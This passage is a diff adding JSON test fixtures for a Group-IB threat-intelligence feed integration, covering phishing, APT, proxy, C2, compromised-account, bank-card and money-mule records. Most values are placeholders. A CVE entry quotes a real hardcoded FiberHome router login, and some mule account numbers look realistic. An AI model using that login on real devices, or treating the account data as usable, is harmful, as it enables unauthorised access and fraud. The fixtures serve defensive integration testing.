"dateRegistered": "2013-11-15 13:41:30", - "title": "", - "registrar": "Some" - }, - "portalLink": "https://bt.group-ib.com/attacks/phishing?searchValue=id:fce7f92d0b64946cf890842d083953649b259952", - "seqUpdate": 1614925293641, - "status": "In response", - "targetBrand": "Some brand", - "targetCategory": "Finance > Banking", - "targetCountryName": null, - "targetDomain": "some.ru", - "type": "Phishing", - "url": "https://some.ru" - }, - "attacks/phishing_kit": { - "dateDetected": "2021-01-14T12:10:41+00:00", - "dateFirstSeen": "2021-01-14T13:10:41+00:00", - "dateLastSeen": "2021-01-14T14:12:17+00:00", - "downloadedFrom": [ - { - "date": "2021-01-21 10:10:41", - "url": "https://some.ru", - "domain": "some.ru", - "fileName": "show.zip" - }, - { - "date": "2021-01-21 10:10:41", - "url": "https://some.ru", - "domain": "some.ru", - "fileName": "show.zip" - }, - { - "date": "2021-01-21 10:10:41", - "url": "https://some.ru", - "domain": "some.ru", - "fileName": "show.zip" - } - ], - "emails": [], - "evaluation": { - "admiraltyCode": "B2", - "credibility": 70, - "reliability": 80, - "severity": "orange", - "tlp": "amber", - "ttl": 30 - }, - "hash": "8d7ea805fe20d6d77f57e2f0cadd17b1", - "id": "044f3f2cb599228c1882884eb77eb073f68a25f2", - "isFavourite": false, - "isHidden": false, - "oldId": "396793696", - "path": "https://tap.group-ib.com/api/api/v2/web/attacks/phishing_kit/044f3f2cb599228c1882884eb77eb073f68a25f2/file/95b61a1df152012abb79c3951ed98680e0bd917bbcf1d440e76b66a120292c76", - "portalLink": "https://bt.group-ib.com/attacks/phishing_kit?searchValue=id:044f3f2cb599228c1882884eb77eb073f68a25f2", - "seqUpdate": 1614921031175, - "targetBrand": [], - "tsFirstSeen": null, - "tsLastSeen": null, - "variables": null - }, - "apt/threat": { - "contacts": [], - "countries": [], - "createdAt": "2021-01-15T16:53:20+03:00", - "cveList": [], - "dateFirstSeen": "2021-01-15", - "dateLastSeen": "2021-01-15", - "datePublished": "2021-01-15", - "description": "sdasdsa", - 
"displayOptions": { - "isFavourite": false, - "isHidden": false - }, - "evaluation": { - "admiraltyCode": "B1", - "credibility": 100, - "reliability": 80, - "severity": "orange", - "tlp": "amber", - "ttl": null - }, - "expertise": [], - "files": [ - { - "hash": "612312f6cf9d2e6c978898117b7b5b85035b3d5e67c4ee266879868c9eb24dd3", - "mime": "image/png", - "name": "612312f6cf9d2e6c978898117b7b5b85035b3d5e67c4ee266879868c9eb24dd3", - "size": 209254 - } - ], - "forumsAccounts": [], - "id": "1b09d389d016121afbffe481a14b30ea995876e4", - "indicatorMalwareRelationships": [], - "indicatorRelationships": [ - { - "sourceId": "9f3a2a244570a38e772a35d7c9171eed92bec6f7", - "targetId": "12cad1ca535a92a2ed306c0edf3025e7d9776693" - } - ], - "indicatorToolRelationships": [], - "indicators": [ - { - "description": null, - "id": "42a9929807fd954918f9bb603135754be7a6e99c", - "langs": ["en"], - "malwareList": [], - "params": { - "hashes": { - "md4": "", - "md5": "5d43baf1c9e9e3a939e5defd8f8fbd8d", - "md6": "", - "ripemd160": "", - "sha1": "d5ff73c043f3bb75dd749636307500b60a436550", - "sha224": "", - "sha256": "867c8b49d29ae1f6e4a7cd31b6fe7e278753a1ba03d4be338ed11fd1efc7dd36", - "sha384": "", - "sha512": "", - "whirlpool": "" - }, - "name": "5d43baf1c9e9e3a939e5defd8f8fbd8d", - "size": null - }, - "seqUpdate": 16107188498634, - "techSeqUpdate": null, - "title": null, - "type": "file" - }, - { - "description": null, - "id": "12cad1ca535a92a2ed306c0edf3025e7d9776693", - "langs": ["en"], - "malwareList": [], - "params": { - "domain": "some.ru", - "ipv4": ["11.11.11.11", "11.11.11.11"], - "ipv6": [], - "ssl": [], - "url": "https://some.ru" - }, - "seqUpdate": 16107188498908, - "techSeqUpdate": null, - "title": null, - "type": "network" - } - ], - "indicatorsIds": [ - "9f3a2a244570a38e772a35d7c9171eed92bec6f7", - "8b96c56cbc980c1e3362060ffa953e65281fb4df", - "42a9929807fd954918f9bb603135754be7a6e99c", - "12cad1ca535a92a2ed306c0edf3025e7d9776693" - ], - "isTailored": false, - "labels": [], - 
"langs": ["en", "ru"], - "malwareList": [], - "mitreMatrix": [ - { - "attackPatternId": "attack-pattern--45242287-2964-4a3e-9373-159fad4d8195", - "attackTactic": "establish-&-maintain-infrastructure", - "attackType": "pre_attack_tactics", - "id": "PRE-T1105", - "params": {"data": ""} - }, - { - "attackPatternId": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", - "attackTactic": "execution", - "attackType": "enterprise_tactics", - "id": null, - "params": {"data": ""} - }, - { - "attackPatternId": "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5", - "attackTactic": "execution", - "attackType": "enterprise_tactics", - "id": null, - "params": {"data": ""} - } - ], - "oldId": "4c01c2d4-5ebb-44d8-9e91-be89231b0eb3", - "regions": [], - "relatedThreatActors": [], - "reportNumber": "CP-2501-1653", - "sectors": ["financial-services", "finance"], - "seqUpdate": 16107218765545, - "shortDescription": null, - "shortTitle": null, - "sources": [], - "targetedCompany": [], - "targetedPartnersAndClients": [], - "techSeqUpdate": null, - "threatActor": { - "country": "KP", - "id": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", - "isAPT": true, - "name": "Lazarus" - }, - "title": "Lazarus launches new attack with cryptocurrency trading platforms", - "toolList": [], - "type": "threat", - "updatedAt": "2021-01-15T16:53:20+03:00" - }, - "suspicious_ip/tor_node": { - "dateFirstSeen": "2020-09-03T14:15:25+00:00", - "dateLastSeen": "2021-01-20T22:07:33+00:00", - "evaluation": { - "admiraltyCode": "A1", - "credibility": 90, - "reliability": 90, - "severity": "green", - "tlp": "green", - "ttl": 30 - }, - "id": "11.11.11.11", - "ipv4": { - "asn": null, - "city": null, - "countryCode": null, - "countryName": null, - "ip": "11.11.11.11", - "provider": null, - "region": null - }, - "nodes": [], - "portalLink": "https://bt.group-ib.com/suspicious/tor?searchValue=id:11.11.11.11", - "seqUpdate": 16110967720000, - "source": "check.torproject.org" - }, - "suspicious_ip/open_proxy": { - 
"anonymous": "High anonymous / Elite proxy", - "dateDetected": "2021-01-21T11:01:02+00:00", - "dateFirstSeen": "2020-03-19T23:01:01+00:00", - "evaluation": { - "admiraltyCode": "C3", - "credibility": 50, - "reliability": 50, - "severity": "green", - "tlp": "white", - "ttl": 15 - }, - "id": "cc6a2856da2806b03839f81aa214f22dbcfd7369", - "ipv4": { - "asn": null, - "city": null, - "countryCode": "CZ", - "countryName": "Czech Republic", - "ip": "11.11.11.11", - "provider": "DataCamp s.r.o.", - "region": null - }, - "isFavourite": false, - "isHidden": false, - "oldId": "241549215", - "port": 80, - "portalLink": "https://bt.group-ib.com/suspicious/proxies?searchValue=id:cc6a2856da2806b03839f81aa214f22dbcfd7369", - "seqUpdate": 1614925979879, - "source": "free-proxy-list.net", - "type": "http" - }, - "suspicious_ip/socks_proxy": { - "dateDetected": "2021-01-19T07:41:11+00:00", - "dateFirstSeen": "2021-01-19T07:41:11+00:00", - "dateLastSeen": "2021-01-21T08:35:46+00:00", - "evaluation": { - "admiraltyCode": "A1", - "credibility": 100, - "reliability": 90, - "severity": "green", - "tlp": "amber", - "ttl": 2 - }, - "id": "02e385600dfc5bf9b3b3656df8e0e20f5fc5c86e", - "ipv4": { - "asn": "AS60999 Libatech SAL", - "city": null, - "countryCode": "LB", - "countryName": "Lebanon", - "ip": "11.11.11.11", - "provider": "Libatech SAL", - "region": null - }, - "isFavourite": false, - "isHidden": false, - "oldId": "395880626", - "portalLink": "https://bt.group-ib.com/suspicious/socks?searchValue=id:02e385600dfc5bf9b3b3656df8e0e20f5fc5c86e", - "seqUpdate": 1614926061941, - "source": "some.ru" - }, - "malware/cnc": { - "cnc": "https://some.ru", - "dateDetected": "2021-01-21T10:35:21+00:00", - "dateLastSeen": "2021-01-21T10:35:21+00:00", - "domain": "some.ru", - "file": [], - "id": "aeed277396e27e375d030a91533aa232444d0089", - "ipv4": [ - { - "asn": "AS3356 Level 3 Communications, Inc.", - "city": null, - "countryCode": "US", - "countryName": "United States", - "ip": "11.11.11.11", - 
"provider": "Alibaba.com Singapore E-Commerce Private Limited", - "region": null - } - ], - "ipv6": [], - "isFavourite": false, - "isHidden": false, - "malwareList": [ - {"id": "e99c294ffe7b79655d6ef1f32add638d8a2d4b24", "name": "JS Sniffer - Poter"} - ], - "oldId": "211146923", - "platform": null, - "seqUpdate": 1614925981037, - "ssl": [], - "threatActor": null, - "url": "https://some.ru" - }, - "osi/vulnerability": { - "affectedSoftware": [ - { - "name": "fiberhome hg6245d firmware", - "operator": "le", - "version": "rp2613" - } - ], - "bulletinFamily": "NVD", - "cpe": ["cpe:/o:fiberhome:hg6245d_firmware:rp2613"], - "cpeTable": [ - { - "type": "os", - "vendor": "fiberhome", - "product": "hg6245d_firmware", - "version": "rp2613", - "string": "cpe:/o:fiberhome:hg6245d_firmware:rp2613", - "string23": "cpe:2.3:o:fiberhome:hg6245d_firmware:rp2613:*:*:*:*:*:*:*", - "part": "o", - "update": "", - "edition": "", - "language": "", - "swEdition": "", - "targetHw": "", - "other": "", - "prefix": "" - } - ], - "cveList": null, - "cvss": { - "score": 7.5, - "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P" - }, - "dateLastSeen": "2021-02-11T14:35:24+03:00", - "dateModified": "2021-02-11T00:45:00+03:00", - "datePublished": "2021-02-10T19:15:00+03:00", - "description": "An issue was discovered on FiberHome HG6245D devices through RP2613. The web daemon contains the hardcoded awnfibre / fibre@dm!n credentials for an ISP.", - "displayOptions": { - "isFavourite": false, - "isHidden": false - }, - "evaluation": { - "admiraltyCode": "A1", - "credibility": 100, - "reliability": 100, - "severity": "green", - "tlp": "green", - "ttl": 30 - }, - "exploitCount": 0, - "exploitList": [], - "extCvss": { - "base": 9.8, - "environmental": 0, - "exploitability": 3.9, - "impact": 5.9, - "mImpact": 0, - "overall": 9.8, - "temporal": 0, - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" - }, - "extDescription": "A vulnerability was found in FiberHome HG6245D up to RP2613 and classified as critical. 
This issue affects some unknown functionality of the component Web Daemon. There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.", - "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27152", - "id": "CVE-2021-27152", - "lastseen": "2021-02-11T14:35:24 03:00", - "portalLink": "https://bt.group-ib.com/osi/vulnerabilities?searchValue=id:CVE-2021-27152", - "provider": "some.ru", - "references": [ - "https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html#httpd-hardcoded-credentials" - ], - "reporter": "some@gmail.ru", - "seqUpdate": 16130451156953, - "softwareMixed": [ - { - "arch": [], - "hardware": "", - "hardwareVendor": "", - "hardwareVersion": "", - "os": "hg6245d_firmware", - "osVendor": "fiberhome", - "osVersion": "rp2613", - "rel": [], - "softwareFileName": "", - "softwareName": [], - "softwareType": [], - "softwareVersion": [], - "softwareVersionString": "", - "vendor": "fiberhome", - "versionOperator": "" - } - ], - "threats": [], - "threatsList": [], - "timeLineData": [], - "title": "CVE-2021-27152", - "type": "cve" - }, - "ioc/common":{ - "id": "1111111111111111111111111111111111111111", - "type": "network", - "dateFirstSeen": "2012-10-24T00:00:00Z", - "dateLastSeen": "2016-10-24T00:00:00Z", - "domain": "some.ru", - "url": "https://some.ru", - "ip": [ - "11.11.11.11" - ], - "hash": [ - "1111111111111111111111111111111111111111", - "1111111111111111111111111111111111111111111111111111111111111111", - "11111111111111111111111111111111" - ], - "seqUpdate": 16408877331936, - "malwareList": [ - { - "name": "GratefulPOS", - "aliases": [] - } - ], - "threatList": [ - { - "name": "FIN6", - "title": "Discovered GratefulPOS samples, presumably, linked with Fin6 activity" - } - ] - } -} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/main_collections_examples.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/main_collections_examples.json
new file mode 100644
index 000000000000..64a5e8366f8e
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/main_collections_examples.json
@@ -0,0 +1,19588 @@ +{ + "compromised/account_group":{ + "count": 630118817, + "items": [ + { + "id": "96339c2618783a2ffd3fe3f0e855bc63b4890688", + "dateFirstSeen": "2013-05-21T00:00:00+00:00", + "dateLastSeen": "2013-05-21T00:00:00+00:00", + "dateFirstCompromised": null, + "dateLastCompromised": null, + "port": null, + "login": "examplelogin", + "password": "123456789", + "parsedLogin": { + "domain": null, + "ip": null + }, + "service": { + "domain": "example.example.com", + "ip": null, + "url": "http://example.example.com/", + "host": "example.example.com" + }, + "events": [ + { + "id": "63b797f8b9924391d6669f55b80bbb43f1a7f285", + "oldId": "6285", + "stixGuid": "1db49a6a-4844-4d80-d2a6-e990a14bcba2", + "cnc": { + "cnc": "", + "domain": null, + "ipv4": null, + "ipv6": null, + "url": null + }, + "client": { + "ipv4": { + "asn": "AS1111", + "city": "City", + "region": "Europe", + "provider": "LLC Orange Business Services", + "countryCode": "NL", + "countryName": "Netherlands", + "ip": "1.1.0.1" + }, + "ipv6": null + }, + "source": { + "id": "", + "type": "", + "idType": "" + }, + "person": null, + "malware": null, + "threatActor": null, + "dateDetected": "2013-05-21T00:00:00+00:00", + "dateCompromised": null, + "additionalData": null + } + ], + "eventCount": 1, + "silentInsert": null, + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "red", + "ttl": 30 + }, + "seqUpdate": 1450014347005000, + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isFavourite": false + }, + "malware": [], + "threatActor": [], + "source": [], + "sourceType": [], + "sourceId": [] + }, + { + "id": "62ecbec64a7c69bebb8894fcef3ac848e74080b1", + "dateFirstSeen": "2013-05-21T00:00:00+00:00", + "dateLastSeen": "2013-05-21T00:00:00+00:00", + "dateFirstCompromised": null, + "dateLastCompromised": null, + "port": null, + "login": "loginexample", + "password": "password123", + 
"parsedLogin": { + "domain": null, + "ip": null + }, + "service": { + "domain": "example.example.com", + "ip": null, + "url": "http://example.example.com/", + "host": "example.example.com" + }, + "events": [ + { + "id": "26ae9e9017a7ccd6be71640a55976b3e1172c492", + "oldId": "6291", + "stixGuid": "f57e7a34-91a6-567f-fbab-d204cf9e132b", + "cnc": { + "cnc": "", + "domain": null, + "ipv4": null, + "ipv6": null, + "url": null + }, + "client": { + "ipv4": { + "asn": "AS1111", + "city": "City", + "region": "Europe", + "provider": "LLC Orange Business Services", + "countryCode": "NL", + "countryName": "Netherlands", + "ip": "1.1.0.1" + }, + "ipv6": null + }, + "source": { + "id": "", + "type": "", + "idType": "" + }, + "person": null, + "malware": null, + "threatActor": null, + "dateDetected": "2013-05-21T00:00:00+00:00", + "dateCompromised": null, + "additionalData": null + } + ], + "eventCount": 1, + "silentInsert": null, + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "red", + "ttl": 30 + }, + "seqUpdate": 1450014347013000, + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isFavourite": false + }, + "malware": [], + "threatActor": [], + "source": [], + "sourceType": [], + "sourceId": [] + }, + { + "id": "ba987664a068419d7e6e9ea8988df0e7b38b2f14", + "dateFirstSeen": "2013-05-21T00:00:00+00:00", + "dateLastSeen": "2013-05-21T00:00:00+00:00", + "dateFirstCompromised": null, + "dateLastCompromised": null, + "port": null, + "login": "12345", + "password": "12345", + "parsedLogin": { + "domain": null, + "ip": null + }, + "service": { + "domain": "example.example.com", + "ip": null, + "url": "http://example.example.com/", + "host": "example.example.com" + }, + "events": [ + { + "id": "eabc301dc60356c65ac7256ee1ba528f8422cd33", + "oldId": "6300", + "stixGuid": "3bfaab11-e4f9-49a9-faf8-eb1f029b39a3", + "cnc": { + "cnc": "", + "domain": null, + "ipv4": null, + 
"ipv6": null, + "url": null + }, + "client": { + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": "192.168.0.1" + }, + "ipv6": null + }, + "source": { + "id": "", + "type": "", + "idType": "" + }, + "person": null, + "malware": null, + "threatActor": null, + "dateDetected": "2013-05-21T00:00:00+00:00", + "dateCompromised": null, + "additionalData": null + } + ], + "eventCount": 1, + "silentInsert": null, + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "red", + "ttl": 30 + }, + "seqUpdate": 1450014347019000, + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isFavourite": false + }, + "malware": [], + "threatActor": [], + "source": [], + "sourceType": [], + "sourceId": [] + } + ], + "settings": { + "search": { + "tags": [ + "hr_cnc_country", + "hr_victim_country", + "victim_country", + "victim_ip", + "cnc_ip_country_name", + "service_domain", + "service_domain.tree", + "service_ip", + "login_domain", + "login_domain.tree", + "login_ip", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "threat_actor", + "malware", + "source", + "source_type", + "severity", + "seqUpdate", + "options", + "few_events", + "ip", + "domain", + "domain.tree", + "id", + "os_family", + "os_details", + "antivirus_software", + "os_architecture", + "system_locale", + "stealer_build", + "probable_corporate_access", + "notification_id" + ], + "fields": [ + "victim_country", + "victim_ip", + "cnc_ip_country_name", + "threat_actor", + "service_domain", + "service_domain.tree", + "service_ip", + "login_domain", + "login_domain.tree", + "login_ip", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "malware", + "source", + "source_type", + "severity", + "seqUpdate", + "event_count", + "id", + "login", + "email", + "ip", + "domain", + "domain.tree", + "dateFirstCompromised", + "dateLastCompromised", 
+ "host_hwid", + "host_domain", + "host_domain.tree", + "host_pcname", + "host_malware_path" + ], + "sorts": [ + "first_seen", + "last_seen", + "date_first_compromised", + "date_last_compromised", + "seqUpdate" + ] + } + }, + "seqUpdate": 1450014347019000 + }, + "compromised/bank_card_group":{ + "count": 534786, + "items": [ + { + "id": "1a07ffa146409f1ed51675155b54b81a4257a742", + "baseName": null, + "serviceCode": null, + "cardInfo": { + "type": "PERSONAL", + "system": "DISCOVER", + "issuer": { + "countryCode": "US", + "issuer": "DISCOVER BANK" + }, + "number": "1111111111111111", + "bin": [ + "111111" + ] + }, + "events": [ + { + "id": "45ba38d145df986e00a0a1a81814048a87282f2a", + "cardInfo": { + "dump": null, + "cvv": "240", + "pin": null, + "validThruDate": "2021-09-30", + "validThru": "09/2021" + }, + "client": { + "ipv4": null, + "ipv6": null + }, + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": null, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "price": null, + "malware": { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03", + "stixGuid": "475fcc52-ca48-c451-f232-f9b009ac2a73" + }, + "threatActor": { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc", + "stixGuid": "8e1fa810-d259-5c57-5261-874f5c2b2cdd", + "isAPT": false + }, + "owner": { + "address": null, + "birthday": null, + "countryCode": "US", + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null, + "zip": null + }, + "dateCompromised": "2022-11-10T16:03:00+00:00", + "dateDetected": "2022-11-15T07:20:30+00:00", + "source": { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": null + }, + "isDump": false, + "isExpired": true, + "oldId": "976570125", + "externalId": "", + "track": [] + } + ], + "eventCount": 1, + "dateFirstSeen": "2022-11-15T07:20:30+00:00", + "dateLastSeen": "2022-11-15T07:20:30+00:00", + 
"dateFirstCompromised": "2022-11-10T16:03:00+00:00", + "dateLastCompromised": "2022-11-10T16:03:00+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "red", + "ttl": 90 + }, + "seqUpdate": 1673147825395, + "stixGuid": "8bd1a0ae-2191-d411-c025-332e37e115ba", + "silentInsert": true, + "isMasked": false, + "displayOptions": { + "favouriteForCompanies": [], + "ignoreForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isIgnore": false, + "isFavourite": false + }, + "malware": [ + { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03" + } + ], + "threatActor": [ + { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc" + } + ], + "source": [ + { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": "" + } + ], + "sourceId": [ + "https://anonfiles.com/F5SeMbG0y4/120k_txt" + ], + "sourceType": [ + "Leak" + ] + }, + { + "id": "f4d32fd739748e75d48a3f397536356e0031a1c3", + "baseName": null, + "serviceCode": null, + "cardInfo": { + "type": "PERSONAL", + "system": "DISCOVER", + "issuer": { + "countryCode": "US", + "issuer": "DISCOVER BANK" + }, + "number": "1111111111111110", + "bin": [ + "111111" + ] + }, + "events": [ + { + "id": "45ba38d145df986e00a0a1a81814048a87282f2a", + "cardInfo": { + "dump": null, + "cvv": "409", + "pin": null, + "validThruDate": "2022-07-31", + "validThru": "07/2022" + }, + "client": { + "ipv4": null, + "ipv6": null + }, + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": null, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "price": null, + "malware": { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03", + "stixGuid": "475fcc52-ca48-c451-f232-f9b009ac2a73" + }, + "threatActor": { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc", + "stixGuid": "8e1fa810-d259-5c57-5261-874f5c2b2cdd", + "isAPT": false + }, + 
"owner": { + "address": null, + "birthday": null, + "countryCode": "US", + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null, + "zip": null + }, + "dateCompromised": "2022-11-10T16:03:00+00:00", + "dateDetected": "2022-11-15T07:20:30+00:00", + "source": { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": null + }, + "isDump": false, + "isExpired": true, + "oldId": "976570179", + "externalId": "", + "track": [] + } + ], + "eventCount": 1, + "dateFirstSeen": "2022-11-15T07:20:30+00:00", + "dateLastSeen": "2022-11-15T07:20:30+00:00", + "dateFirstCompromised": "2022-11-10T16:03:00+00:00", + "dateLastCompromised": "2022-11-10T16:03:00+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "red", + "ttl": 90 + }, + "seqUpdate": 1673147827461, + "stixGuid": "22a20ce1-72ba-082b-16c3-c2465c613782", + "silentInsert": true, + "isMasked": false, + "displayOptions": { + "favouriteForCompanies": [], + "ignoreForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isIgnore": false, + "isFavourite": false + }, + "malware": [ + { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03" + } + ], + "threatActor": [ + { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc" + } + ], + "source": [ + { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": "" + } + ], + "sourceId": [ + "https://anonfiles.com/F5SeMbG0y4/120k_txt" + ], + "sourceType": [ + "Leak" + ] + }, + { + "id": "5b53acb50d9954d5a8f8455400747931568c8ead", + "baseName": null, + "serviceCode": null, + "cardInfo": { + "type": "PERSONAL", + "system": "DISCOVER", + "issuer": { + "countryCode": "US", + "issuer": "DISCOVER BANK" + }, + "number": "1111111111111112", + "bin": [ + "111111" + ] + }, + "events": [ + { + "id": "45ba38d145df986e00a0a1a81814048a87282f2a", + "cardInfo": 
{ + "dump": null, + "cvv": "989", + "pin": null, + "validThruDate": "2022-09-30", + "validThru": "09/2022" + }, + "client": { + "ipv4": null, + "ipv6": null + }, + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": null, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "price": null, + "malware": { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03", + "stixGuid": "475fcc52-ca48-c451-f232-f9b009ac2a73" + }, + "threatActor": { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc", + "stixGuid": "8e1fa810-d259-5c57-5261-874f5c2b2cdd", + "isAPT": false + }, + "owner": { + "address": null, + "birthday": null, + "countryCode": "US", + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null, + "zip": null + }, + "dateCompromised": "2022-11-10T16:03:00+00:00", + "dateDetected": "2022-11-15T07:20:30+00:00", + "source": { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": null + }, + "isDump": false, + "isExpired": true, + "oldId": "976570208", + "externalId": "", + "track": [] + } + ], + "eventCount": 1, + "dateFirstSeen": "2022-11-15T07:20:30+00:00", + "dateLastSeen": "2022-11-15T07:20:30+00:00", + "dateFirstCompromised": "2022-11-10T16:03:00+00:00", + "dateLastCompromised": "2022-11-10T16:03:00+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "red", + "ttl": 90 + }, + "seqUpdate": 1673147828497, + "stixGuid": "49607d22-648a-39ae-485f-db32b2e3ac96", + "silentInsert": true, + "isMasked": false, + "displayOptions": { + "favouriteForCompanies": [], + "ignoreForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isIgnore": false, + "isFavourite": false + }, + "malware": [ + { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03" + } + ], + "threatActor": [ + { + "name": "VMCARD", + "id": 
"61b4097bdc7554a0f46279d01eadf016c60c58bc" + } + ], + "source": [ + { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": "" + } + ], + "sourceId": [ + "https://anonfiles.com/F5SeMbG0y4/120k_txt" + ], + "sourceType": [ + "Leak" + ] + } + ], + "settings": { + "search": { + "tags": [ + "card_system", + "card_type", + "card_issuer", + "malware", + "source_type", + "source", + "owner_country_code", + "is_masked", + "is_dump", + "is_expired", + "company", + "company_id", + "bin", + "severity", + "options", + "has_zip", + "hasnt_filled_zip", + "threat_actor", + "seqUpdate", + "few_events", + "ip", + "domain", + "domain.tree", + "notification_id", + "id" + ], + "fields": [ + "card_system", + "card_type", + "card_issuer", + "malware", + "cybercrime", + "source_type", + "source", + "owner_country_code", + "is_masked", + "is_dump", + "is_expired", + "company", + "company_id", + "threat_actor", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "bin", + "cardInfo.number", + "severity", + "seqUpdate", + "event_count", + "id", + "ip", + "domain", + "domain.tree", + "date_first_compromised", + "date_last_compromised", + "dateFirstCompromised", + "dateLastCompromised" + ], + "sorts": [ + "first_seen", + "last_seen", + "date_first_compromised", + "date_last_compromised", + "seqUpdate" + ] + } + }, + "seqUpdate": 1673147828497 + }, + "compromised/mule":{ + "count": 35251, + "items": [ + { + "id": "5eb9ccb5081203e82ac1159e44747a6af4bb7391", + "account": "4351391043922426", + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": null + }, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "dateAdd": "2015-08-07T16:00:40+00:00", + "dateIncident": "2015-07-23T20:00:00+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "amber", 
+ "ttl": 30 + }, + "hash": "2a006b1d3bc002c4fb133d6b74bd2f09", + "info": null, + "malware": null, + "oldId": "44453", + "operatorClabe": null, + "organization": { + "bic": null, + "bicRu": null, + "bsb": null, + "iban": null, + "name": "ОАО АКБ \"УРАЛ ФД\"", + "swift": null, + "clabe": null + }, + "person": { + "address": null, + "birthday": null, + "countryCode": null, + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null + }, + "seqUpdate": 1454699132268, + "sourceType": null, + "stixGuid": "daae3751-e9d1-210d-cf53-cbb5e76bbaa4", + "threatActor": null, + "type": "Person", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [ + 3146 + ], + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "7db6ee3515cc1a019b057a32210e1d95090dac88", + "account": "4351391043368307", + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": null + }, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "dateAdd": "2015-07-20T15:34:03+00:00", + "dateIncident": "2015-07-05T20:00:00+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "hash": "e193977ea8efc516319904b340a5901d", + "info": null, + "malware": null, + "oldId": "23398", + "operatorClabe": null, + "organization": { + "bic": null, + "bicRu": null, + "bsb": null, + "iban": null, + "name": "ОАО АКБ \"УРАЛ ФД\"", + "swift": null, + "clabe": null + }, + "person": { + "address": null, + "birthday": null, + "countryCode": null, + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null + }, + "seqUpdate": 1454699133282, + 